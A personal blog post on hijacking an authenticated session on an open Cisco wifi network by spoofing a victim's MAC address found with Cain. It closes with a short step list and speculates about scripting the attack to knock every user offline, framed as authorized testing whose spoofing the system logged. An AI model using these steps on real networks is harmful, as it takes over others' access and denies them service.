How To hijack an authenticated session on an open wifi network

I discovered that it is fairly easy to hijack an authenticated user session on an "open" wifi network. A lot of businesses and schools utilize open networks that present a splash page (web page) to users who try to access the internet through the wireless network. This is obviously for security and resource management purposes.

I tested this hijack method using Windows XP(rogue) and Windows 7(victim) on a very sophisticated enterprise grade managed wifi system from Cisco that has just been installed (October 2011). I work as an all-around IT guy. I do a little coding, configure servers, construct automated software rollouts, setup Windows 7 deployments, and conduct research in my down time.

Noticing that the Cisco wifi controller managed access (authenticated to the AD) based on MAC address I wondered if I could just spoof the MAC and take over (use) someone else's session who had already authenticated. This mimmicks a rogue unauthorized user looking to gain access to the network--turns out it is super easy. This process also denies the authentic user their access in the process, so this is not nice.

I used Cain to gather a list of users (MACS) after connecting to the "open" part of the wifi network. Next , I changed my MAC in Windows XP (registry) to reflect the MAC of my victim (taken from the list in Cain). Finally, I refreshed my NIC which was then assigned the IP address (DHCP) of my victim. So at this point we both have the same MAC and the same IP address. My machine, however, is able to browse the internet using what was once their session. Thier machine is now crippled, unable to access anything.

They can reboot which will refresh their IP address assignment (from DHCP) and grant them their authenticated session back, depriving me. All you have to do, however, is refresh (Disable/Enable) again to steal it back. Although I haven't tried it (yet), I presume you can write a script to cycle through the entire network stealing everyone's session in turn; basically denying everyone service (related VLANs).

I'm not 100% sure how you could mitigate this situation or prevent it, but I will be looking into this. I'm also curious to see if something like this can work on access points/VLANS requiring a key or under other configurations. I will be testing.

DISCLAIMER: I performed this as a research project to test a network which I was authorized to work on. Furthermore, I did not intrude on any user's access; both laptops were on my desk at the time. Performing this hack on a network without authorization can subject you to prosecution--so do not do this unless you are willing to pay the price.

UPDATE: The Cisco wifi system in question did detect and log the spoofing of the MAC addresses.

    To Test

  • Leave the victim authenticated
  • Scan with Cain, find the victim's MAC
  • Change the rogue PC's MAC in the registry
  • Refresh or reboot the rogue PC
  • Enjoy internet access on the rogue


How To Spoof a MAC in Windows

Questions? Comments? Email: software@datavirtue.com